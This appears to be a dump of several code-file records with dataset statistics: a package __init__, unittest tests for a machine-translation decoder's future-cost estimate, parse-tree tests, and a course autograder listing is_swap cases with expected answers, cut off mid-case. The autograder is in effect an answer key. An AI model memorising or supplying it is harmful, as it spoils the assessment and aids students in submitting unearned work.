LIDG_v0.3/lidg/model_selection/__init__.py
|
Hitoshi-FUJII/LIDG
|
8af1f6a64d22c231df41f9a8872c1f52c5db4b1a
|
[
"MIT"
] | null | null | null |
LIDG_v0.3/lidg/model_selection/__init__.py
|
Hitoshi-FUJII/LIDG
|
8af1f6a64d22c231df41f9a8872c1f52c5db4b1a
|
[
"MIT"
] | null | null | null |
import lidg.model_selection.elastic_net
import lidg.model_selection.exhaustive_search
import lidg.model_selection.genetic_algorithm
| 33
| 45
| 0.909091
| 18
| 132
| 6.333333
| 0.555556
| 0.263158
| 0.394737
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 132
| 3
| 46
| 44
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7dcfdbc94a9b4e88400ed6c0f1ffa64a5b2f24ac
| 22,189
|
py
|
Python
|
test/test_stackdecoder.py
|
kenkov/smt
|
db0a9fff15876442f1895b3ef730e91f7c84ad9b
|
[
"MIT"
] | 83
|
2015-01-12T14:40:08.000Z
|
2022-01-07T09:41:09.000Z
|
test/test_stackdecoder.py
|
HimmelStein/smt
|
db0a9fff15876442f1895b3ef730e91f7c84ad9b
|
[
"MIT"
] | 1
|
2016-12-08T21:22:23.000Z
|
2016-12-08T21:22:23.000Z
|
test/test_stackdecoder.py
|
HimmelStein/smt
|
db0a9fff15876442f1895b3ef730e91f7c84ad9b
|
[
"MIT"
] | 38
|
2015-04-08T04:39:13.000Z
|
2021-11-14T13:16:19.000Z
|
#! /usr/bin/env python
# coding:utf-8
import unittest
from fractions import Fraction as Frac
from smt.decoder.stackdecoder import _future_cost_estimate
from smt.decoder.stackdecoder import _create_estimate_dict
from smt.decoder.stackdecoder import ArgumentNotSatisfied
from smt.decoder.stackdecoder import future_cost_estimate
from smt.decoder.stackdecoder import TransPhraseProb
from smt.decoder.stackdecoder import Phrase
# sqlalchemy
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
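# DBSetup is a small context manager that creates the phrase tables on an SQLite engine and drops them again on exit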
class DBSetup(object):
def __init__(self, db="sqlite:///:memory:"):
self.db = db
self.tables = [TransPhraseProb, Phrase]
def __enter__(self):
self.engine = create_engine(self.db)
# create tables
for Table in self.tables:
Table.__table__.create(self.engine)
# create session
Session = sessionmaker(bind=self.engine)
self.session = Session()
return self
def __exit__(self, exc_type, exc_value, traceback):
# drop table
for Table in self.tables:
Table.__table__.drop(self.engine, checkfirst=True)
self.session.close()
class FutureCostEstimateTest(unittest.TestCase):
def setUp(self):
self.maxDiff = None
def test_future_cost_estimate_2to1(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
transfrom = 2
transto = 1
init_val = 100.0
db = "sqlite:///test/:test:"
# data set
dataset = [("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 2
("1", "tourism", Frac(-2), 0),
("1", "tourism", Frac(-3), 0),
# 3
("1", "initiative", Frac(-15, 10), 0),
("1", "initiative", Frac(-25, 10), 0),
# 4
("1", "addresses", Frac(-24, 10), 0),
("1", "addresses", Frac(-34, 10), 0),
# 5
("1", "this", Frac(-14, 10), 0),
("1", "this", Frac(-24, 10), 0),
# 6
("1", "for", Frac(-1), 0),
("1", "for", Frac(-2), 0),
# 7
("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 8
("1", "first", Frac(-19, 10), 0),
("1", "first", Frac(-29, 10), 0),
# 9
("1", "time", Frac(-16, 10), 0),
("1", "time", Frac(-26, 10), 0),
# 10
("1", "initiative addresses", Frac(-4), 0),
("1", "initiative addresses", Frac(-4), 0),
# 11
("1", "this for", Frac(-25, 10), 0),
("1", "this for", Frac(-35, 10), 0),
# 12
("1", "the first", Frac(-22, 10), 0),
("1", "the first", Frac(-32, 10), 0),
# 13
("1", "for the", Frac(-13, 10), 0),
("1", "for the", Frac(-23, 10), 0),
# 14
("1", "first time", Frac(-24, 10), 0),
("1", "first time", Frac(-34, 10), 0),
# 15
("1", "this for the", Frac(-27, 10), 0),
("1", "this for the", Frac(-37, 10), 0),
# 16
("1", "for the first", Frac(-23, 10), 0),
("1", "for the first", Frac(-33, 10), 0),
# 17
("1", "the first time", Frac(-23, 10), 0),
("1", "the first time", Frac(-33, 10), 0),
# 18
("1", "for the first time", Frac(-23, 10), 0),
("1", "for the first time", Frac(-33, 10), 0),
]
val = {(1, 1): -1.0,
(1, 2): -3.0,
(1, 3): -4.5,
(1, 4): -6.9,
(1, 5): -8.3,
(1, 6): -9.3,
(1, 7): -9.6,
(1, 8): -10.6,
(1, 9): -10.6,
(2, 2): -2.0,
(2, 3): -3.5,
(2, 4): -5.9,
(2, 5): -7.3,
(2, 6): -8.3,
(2, 7): -8.6,
(2, 8): -9.6,
(2, 9): -9.6,
(3, 3): -1.5,
(3, 4): -3.9,
(3, 5): -5.3,
(3, 6): -6.3,
(3, 7): -6.6,
(3, 8): -7.6,
(3, 9): -7.6,
(4, 4): -2.4,
(4, 5): -3.8,
(4, 6): -4.8,
(4, 7): -5.1,
(4, 8): -6.1,
(4, 9): -6.1,
(5, 5): -1.4,
(5, 6): -2.4,
(5, 7): -2.7,
(5, 8): -3.6999999999999997,
(5, 9): -3.6999999999999997,
(6, 6): -1.0,
(6, 7): -1.3,
(6, 8): -2.3,
(6, 9): -2.3,
(7, 7): -1.0,
(7, 8): -2.2,
(7, 9): -2.3,
(8, 8): -1.9,
(8, 9): -2.4,
(9, 9): -1.6,
}
with DBSetup(db) as dbobj:
dbobj.session.add_all(TransPhraseProb(lang1p=item[0],
lang2p=item[1],
p2_1=item[2],
p1_2=item[3])
for item in dataset)
dbobj.session.add_all(Phrase(lang1p=item[0],
lang2p=item[1])
for item in dataset)
dbobj.session.commit()
ans = future_cost_estimate(sentences,
transfrom=transfrom,
transto=transto,
init_val=init_val,
db=db)
# assert
self.assertEqual(ans, val)
def test_future_cost_estimate_2to1_argument_not_satisfied(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
transfrom = 2
transto = 1
init_val = 100.0
db = "sqlite:///test/:test:"
# data set
dataset = [("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 2
("1", "tourism", Frac(-2), 0),
("1", "tourism", Frac(-3), 0),
# 3
("1", "initiative", Frac(-15, 10), 0),
("1", "initiative", Frac(-25, 10), 0),
# 4
("1", "addresses", Frac(-24, 10), 0),
("1", "addresses", Frac(-34, 10), 0),
# 5
#("1", "this", Frac(-14, 10), 0),
#("1", "this", Frac(-24, 10), 0),
# 6
("1", "for", Frac(-1), 0),
("1", "for", Frac(-2), 0),
# 7
("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 8
("1", "first", Frac(-19, 10), 0),
("1", "first", Frac(-29, 10), 0),
# 9
("1", "time", Frac(-16, 10), 0),
("1", "time", Frac(-26, 10), 0),
# 10
("1", "initiative addresses", Frac(-4), 0),
("1", "initiative addresses", Frac(-4), 0),
# 11
("1", "this for", Frac(-25, 10), 0),
("1", "this for", Frac(-35, 10), 0),
# 12
("1", "the first", Frac(-22, 10), 0),
("1", "the first", Frac(-32, 10), 0),
# 13
("1", "for the", Frac(-13, 10), 0),
("1", "for the", Frac(-23, 10), 0),
# 14
("1", "first time", Frac(-24, 10), 0),
("1", "first time", Frac(-34, 10), 0),
# 15
("1", "this for the", Frac(-27, 10), 0),
("1", "this for the", Frac(-37, 10), 0),
# 16
("1", "for the first", Frac(-23, 10), 0),
("1", "for the first", Frac(-33, 10), 0),
# 17
("1", "the first time", Frac(-23, 10), 0),
("1", "the first time", Frac(-33, 10), 0),
# 18
("1", "for the first time", Frac(-23, 10), 0),
("1", "for the first time", Frac(-33, 10), 0),
]
val = {(1, 1): -1.0,
(1, 2): -3.0,
(1, 3): -4.5,
(1, 4): -6.9,
(1, 5): -106.9,
(1, 6): -9.4,
(1, 7): -9.6,
(1, 8): -11.5,
(1, 9): -11.7,
(2, 2): -2.0,
(2, 3): -3.5,
(2, 4): -5.9,
(2, 5): -105.9,
(2, 6): -8.4,
(2, 7): -8.6,
(2, 8): -10.5,
(2, 9): -10.7,
(3, 3): -1.5,
(3, 4): -3.9,
(3, 5): -103.9,
(3, 6): -6.4,
(3, 7): -6.6,
(3, 8): -8.5,
(3, 9): -8.7,
(4, 4): -2.4,
(4, 5): -102.4,
(4, 6): -4.9,
(4, 7): -5.1,
(4, 8): -7.0,
(4, 9): -7.199999999999999,
(5, 5): -100.0,
(5, 6): -2.5,
(5, 7): -2.7,
(5, 8): -4.6,
(5, 9): -4.8,
(6, 6): -1.0,
(6, 7): -1.3,
(6, 8): -2.3,
(6, 9): -2.3,
(7, 7): -1.0,
(7, 8): -2.2,
(7, 9): -2.3,
(8, 8): -1.9,
(8, 9): -2.4,
(9, 9): -1.6,
}
with DBSetup(db) as dbobj:
dbobj.session.add_all(TransPhraseProb(lang1p=item[0],
lang2p=item[1],
p2_1=item[2],
p1_2=item[3])
for item in dataset)
dbobj.session.add_all(Phrase(lang1p=item[0],
lang2p=item[1])
for item in dataset)
dbobj.session.commit()
ans = future_cost_estimate(sentences,
transfrom=transfrom,
transto=transto,
init_val=init_val,
db=db)
# assert
self.assertEqual(ans, val)
def test_future_cost_estimate_1to2(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
transfrom = 1
transto = 2
init_val = 100.0
db = "sqlite:///test/:test:"
# data set
dataset = [("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 2
("1", "tourism", Frac(-2), 0),
("1", "tourism", Frac(-3), 0),
# 3
("1", "initiative", Frac(-15, 10), 0),
("1", "initiative", Frac(-25, 10), 0),
# 4
("1", "addresses", Frac(-24, 10), 0),
("1", "addresses", Frac(-34, 10), 0),
# 5
("1", "this", Frac(-14, 10), 0),
("1", "this", Frac(-24, 10), 0),
# 6
("1", "for", Frac(-1), 0),
("1", "for", Frac(-2), 0),
# 7
("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 8
("1", "first", Frac(-19, 10), 0),
("1", "first", Frac(-29, 10), 0),
# 9
("1", "time", Frac(-16, 10), 0),
("1", "time", Frac(-26, 10), 0),
# 10
("1", "initiative addresses", Frac(-4), 0),
("1", "initiative addresses", Frac(-4), 0),
# 11
("1", "this for", Frac(-25, 10), 0),
("1", "this for", Frac(-35, 10), 0),
# 12
("1", "the first", Frac(-22, 10), 0),
("1", "the first", Frac(-32, 10), 0),
# 13
("1", "for the", Frac(-13, 10), 0),
("1", "for the", Frac(-23, 10), 0),
# 14
("1", "first time", Frac(-24, 10), 0),
("1", "first time", Frac(-34, 10), 0),
# 15
("1", "this for the", Frac(-27, 10), 0),
("1", "this for the", Frac(-37, 10), 0),
# 16
("1", "for the first", Frac(-23, 10), 0),
("1", "for the first", Frac(-33, 10), 0),
# 17
("1", "the first time", Frac(-23, 10), 0),
("1", "the first time", Frac(-33, 10), 0),
# 18
("1", "for the first time", Frac(-23, 10), 0),
("1", "for the first time", Frac(-33, 10), 0),
]
val = {(1, 1): -1.0,
(1, 2): -3.0,
(1, 3): -4.5,
(1, 4): -6.9,
(1, 5): -8.3,
(1, 6): -9.3,
(1, 7): -9.6,
(1, 8): -10.6,
(1, 9): -10.6,
(2, 2): -2.0,
(2, 3): -3.5,
(2, 4): -5.9,
(2, 5): -7.3,
(2, 6): -8.3,
(2, 7): -8.6,
(2, 8): -9.6,
(2, 9): -9.6,
(3, 3): -1.5,
(3, 4): -3.9,
(3, 5): -5.3,
(3, 6): -6.3,
(3, 7): -6.6,
(3, 8): -7.6,
(3, 9): -7.6,
(4, 4): -2.4,
(4, 5): -3.8,
(4, 6): -4.8,
(4, 7): -5.1,
(4, 8): -6.1,
(4, 9): -6.1,
(5, 5): -1.4,
(5, 6): -2.4,
(5, 7): -2.7,
(5, 8): -3.6999999999999997,
(5, 9): -3.6999999999999997,
(6, 6): -1.0,
(6, 7): -1.3,
(6, 8): -2.3,
(6, 9): -2.3,
(7, 7): -1.0,
(7, 8): -2.2,
(7, 9): -2.3,
(8, 8): -1.9,
(8, 9): -2.4,
(9, 9): -1.6,
}
with DBSetup(db) as dbobj:
dbobj.session.add_all(TransPhraseProb(lang2p=item[0],
lang1p=item[1],
p1_2=item[2],
p2_1=item[3])
for item in dataset)
dbobj.session.add_all(Phrase(lang1p=item[0],
lang2p=item[1])
for item in dataset)
dbobj.session.commit()
ans = future_cost_estimate(sentences,
transfrom=transfrom,
transto=transto,
init_val=init_val,
db=db)
# assert
self.assertEqual(ans, val)
def test__future_cost_estimate(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
phrase_prob = {(1, 1): Frac(-1),
(2, 2): Frac(-2),
(3, 3): Frac(-15, 10),
(4, 4): Frac(-24, 10),
(5, 5): Frac(-14, 10),
(6, 6): Frac(-1),
(7, 7): Frac(-1),
(8, 8): Frac(-19, 10),
(9, 9): Frac(-16, 10),
(3, 4): Frac(-4),
(5, 6): Frac(-25, 10),
(7, 8): Frac(-22, 10),
(6, 7): Frac(-13, 10),
(8, 9): Frac(-24, 10),
(5, 7): Frac(-27, 10),
(6, 8): Frac(-23, 10),
(7, 9): Frac(-23, 10),
(6, 9): Frac(-23, 10),
}
val = {(1, 1): Frac(-1),
(1, 2): Frac(-3),
(1, 3): Frac(-45, 10),
(1, 4): Frac(-69, 10),
(1, 5): Frac(-83, 10),
(1, 6): Frac(-93, 10),
(1, 7): Frac(-96, 10),
(1, 8): Frac(-106, 10),
(1, 9): Frac(-106, 10),
(2, 2): Frac(-2),
(2, 3): Frac(-35, 10),
(2, 4): Frac(-59, 10),
(2, 5): Frac(-73, 10),
(2, 6): Frac(-83, 10),
(2, 7): Frac(-86, 10),
(2, 8): Frac(-96, 10),
(2, 9): Frac(-96, 10),
(3, 3): Frac(-15, 10),
(3, 4): Frac(-39, 10),
(3, 5): Frac(-53, 10),
(3, 6): Frac(-63, 10),
(3, 7): Frac(-66, 10),
(3, 8): Frac(-76, 10),
(3, 9): Frac(-76, 10),
(4, 4): Frac(-24, 10),
(4, 5): Frac(-38, 10),
(4, 6): Frac(-48, 10),
(4, 7): Frac(-51, 10),
(4, 8): Frac(-61, 10),
(4, 9): Frac(-61, 10),
(5, 5): Frac(-14, 10),
(5, 6): Frac(-24, 10),
(5, 7): Frac(-27, 10),
(5, 8): Frac(-37, 10),
(5, 9): Frac(-37, 10),
(6, 6): Frac(-1),
(6, 7): Frac(-13, 10),
(6, 8): Frac(-23, 10),
(6, 9): Frac(-23, 10),
(7, 7): Frac(-1),
(7, 8): Frac(-22, 10),
(7, 9): Frac(-23, 10),
(8, 8): Frac(-19, 10),
(8, 9): Frac(-24, 10),
(9, 9): Frac(-16, 10)}
ans = _future_cost_estimate(sentences,
phrase_prob)
self.assertEqual(ans, val)
def test__future_cost_estimate_dict_not_satisfied(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
phrase_prob = {(1, 1): Frac(-1),
(2, 2): Frac(-2),
# lack one value
#(3, 3): Frac(-15, 10),
(4, 4): Frac(-24, 10),
(5, 5): Frac(-14, 10),
(6, 6): Frac(-1),
(7, 7): Frac(-1),
(8, 8): Frac(-19, 10),
(9, 9): Frac(-16, 10),
(3, 4): Frac(-4),
(5, 6): Frac(-25, 10),
(7, 8): Frac(-22, 10),
(6, 7): Frac(-13, 10),
(8, 9): Frac(-24, 10),
(5, 7): Frac(-27, 10),
(6, 8): Frac(-23, 10),
(7, 9): Frac(-23, 10),
(6, 9): Frac(-23, 10),
}
self.assertRaises(ArgumentNotSatisfied,
_future_cost_estimate,
sentences,
phrase_prob)
def test_create_estimate_dict(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
init_val = Frac(-100)
phrase_prob = {(1, 1): Frac(-1),
(2, 2): Frac(-2),
# lack one value
#(3, 3): Frac(-15, 10),
(4, 4): Frac(-24, 10),
(5, 5): Frac(-14, 10),
#(6, 6): Frac(-1),
(7, 7): Frac(-1),
# lack one value
#(8, 8): Frac(-19, 10),
(9, 9): Frac(-16, 10),
(3, 4): Frac(-4),
(5, 6): Frac(-25, 10),
(7, 8): Frac(-22, 10),
(6, 7): Frac(-13, 10),
(8, 9): Frac(-24, 10),
(5, 7): Frac(-27, 10),
(6, 8): Frac(-23, 10),
(7, 9): Frac(-23, 10),
(6, 9): Frac(-23, 10),
}
correct = {(1, 1): Frac(-1),
(2, 2): Frac(-2),
# lack one value
(3, 3): init_val,
(4, 4): Frac(-24, 10),
(5, 5): Frac(-14, 10),
(6, 6): init_val,
(7, 7): Frac(-1),
# lack one value
(8, 8): init_val,
(9, 9): Frac(-16, 10),
(3, 4): Frac(-4),
(5, 6): Frac(-25, 10),
(7, 8): Frac(-22, 10),
(6, 7): Frac(-13, 10),
(8, 9): Frac(-24, 10),
(5, 7): Frac(-27, 10),
(6, 8): Frac(-23, 10),
(7, 9): Frac(-23, 10),
(6, 9): Frac(-23, 10),
}
ans = _create_estimate_dict(sentences,
phrase_prob,
init_val=init_val)
self.assertEqual(ans, correct)
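# The expected values above pin down the recurrence behind the future cost
# estimate: for a span (i, j) the best score is either the probability of a
# single phrase covering the whole span or the best split into two adjacent
# sub-spans.  The sketch below illustrates that dynamic program only, and is
# not the implementation under test (assumptions: `phrase_prob` is the same
# {(start, end): log-prob} mapping used above, indices are 1-based and
# inclusive, and every diagonal entry (i, i) is present, as
# _create_estimate_dict guarantees).
def _future_cost_sketch(n_words, phrase_prob):
    """Return {(i, j): best log-probability} for all 1 <= i <= j <= n_words."""
    best = {}
    for length in range(1, n_words + 1):            # span length
        for i in range(1, n_words - length + 2):    # span start
            j = i + length - 1                      # span end (inclusive)
            candidates = []
            if (i, j) in phrase_prob:               # cover the span with one phrase
                candidates.append(phrase_prob[(i, j)])
            for k in range(i, j):                   # or split it after position k
                candidates.append(best[(i, k)] + best[(k + 1, j)])
            best[(i, j)] = max(candidates)
    return best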
if __name__ == '__main__':
unittest.main()
| 37.608475
| 68
| 0.301005
| 2,433
| 22,189
| 2.697082
| 0.06494
| 0.03566
| 0.023773
| 0.027431
| 0.810881
| 0.794118
| 0.762877
| 0.753734
| 0.748247
| 0.736208
| 0
| 0.184213
| 0.520979
| 22,189
| 589
| 69
| 37.672326
| 0.433155
| 0.021813
| 0
| 0.764463
| 0
| 0
| 0.052748
| 0.002912
| 0
| 0
| 0
| 0
| 0.012397
| 1
| 0.020661
| false
| 0
| 0.020661
| 0
| 0.047521
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7ddaa1ffe3e9b01657f3c6e3e8f7e64b4d1977ef
| 1,160
|
py
|
Python
|
tests/test_parse_tree.py
|
workingenius/reb
|
ebc597d95f79d6f2d89a401940f24d7a2c4274f0
|
[
"MIT"
] | 1
|
2021-04-27T04:03:21.000Z
|
2021-04-27T04:03:21.000Z
|
tests/test_parse_tree.py
|
workingenius/reb
|
ebc597d95f79d6f2d89a401940f24d7a2c4274f0
|
[
"MIT"
] | null | null | null |
tests/test_parse_tree.py
|
workingenius/reb
|
ebc597d95f79d6f2d89a401940f24d7a2c4274f0
|
[
"MIT"
] | null | null | null |
from reb.parse_tree import PTNode, VirtualPTNode
def test_parse_tree():
text = 'abcdef'
node = PTNode(text, 0, 3, children=[
VirtualPTNode(text, 0, 2, children=[
PTNode(text, 0, 1),
PTNode(text, 1, 2),
]),
])
assert node.children == [
PTNode(text, 0, 1),
PTNode(text, 1, 2)
]
def test_parse_tree2():
"""Empty nodes are hidden"""
text = 'abcdef'
node = PTNode(text, 0, 3, children=[
VirtualPTNode(text, 0, 2, children=[
PTNode(text, 0, 1),
PTNode(text, 1, 1),
PTNode(text, 1, 2),
]),
])
assert node.children == [
PTNode(text, 0, 1),
PTNode(text, 1, 2)
]
def test_parse_tree3():
text = 'abcdef'
node = PTNode(text, 0, 5, children=[
PTNode(text, 0, 3, children=[
VirtualPTNode(text, 0, 2, children=[
PTNode(text, 0, 1),
PTNode(text, 1, 2),
])
]),
])
assert node.children == [
PTNode(text, 0, 3, children=[
PTNode(text, 0, 1),
PTNode(text, 1, 2),
]),
]
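# The three tests above characterise the `children` contract: a VirtualPTNode
# is transparent (its own children are spliced into the parent's list) and
# zero-width nodes are hidden.  The helper below is only a sketch of that
# behaviour for illustration, not reb's actual implementation (assumptions:
# nodes expose `start`/`end` offsets and a raw `_children` list; the real
# attribute names may differ).
def visible_children(node):
    """Flatten virtual nodes and drop empty ones, as the tests above expect."""
    result = []
    for child in node._children:
        if isinstance(child, VirtualPTNode):
            # A virtual node is invisible: splice its (filtered) children in.
            result.extend(visible_children(child))
        elif child.start != child.end:
            # Keep only non-empty nodes; zero-width nodes stay hidden.
            result.append(child)
    return result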
| 21.090909
| 48
| 0.474138
| 133
| 1,160
| 4.082707
| 0.18797
| 0.331492
| 0.222836
| 0.279926
| 0.839779
| 0.839779
| 0.777164
| 0.777164
| 0.777164
| 0.718232
| 0
| 0.06069
| 0.375
| 1,160
| 55
| 49
| 21.090909
| 0.688276
| 0.018966
| 0
| 0.785714
| 0
| 0
| 0.015887
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 1
| 0.071429
| false
| 0
| 0.02381
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
819d8fc0de89324ea911d9528a3377738a4b2722
| 18,342
|
py
|
Python
|
hog/tests/04.py
|
jamespeace/cs61a-1
|
6203e030e699b290bd93138beb4ede33f9c3c5f1
|
[
"Apache-2.0"
] | null | null | null |
hog/tests/04.py
|
jamespeace/cs61a-1
|
6203e030e699b290bd93138beb4ede33f9c3c5f1
|
[
"Apache-2.0"
] | null | null | null |
hog/tests/04.py
|
jamespeace/cs61a-1
|
6203e030e699b290bd93138beb4ede33f9c3c5f1
|
[
"Apache-2.0"
] | 1
|
2019-11-18T13:15:31.000Z
|
2019-11-18T13:15:31.000Z
|
test = {
'name': 'Question 4',
'points': 2,
'suites': [
{
'cases': [
{
'code': r"""
>>> is_swap(2, 4)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(22, 4)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(28, 4)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(124, 2)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(44, 28)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(2, 0)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(10, 0)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(100, 10)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(14, 2)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(27, 72)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(104, 2)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(66, 6)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(11, 1)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(13, 301)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(559, 629)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(777, 707)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(527, 493)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(664, 249)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(174, 439)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(670, 720)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(713, 227)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(444, 44)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(530, 270)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(348, 638)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(290, 360)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(326, 683)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(352, 146)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(176, 74)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(57, 587)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(757, 908)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(772, 297)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(186, 322)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(275, 120)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(817, 708)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(994, 6)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(240, 850)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(904, 479)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(192, 12)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(899, 192)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(318, 474)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(622, 216)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(906, 689)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(785, 57)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(250, 980)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(441, 104)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(599, 16)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(306, 229)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(391, 728)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(584, 495)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(696, 646)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(287, 257)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(951, 941)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(97, 967)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(966, 69)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(219, 7)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(931, 908)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(435, 860)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(320, 255)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(419, 753)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(270, 490)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(354, 642)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(479, 656)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(563, 337)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(685, 424)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(480, 907)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(57, 485)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(907, 987)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(822, 892)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(73, 713)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(37, 347)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(927, 799)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(950, 50)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(227, 27)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(432, 841)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(951, 91)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(530, 930)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(24, 593)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(116, 139)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(998, 119)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
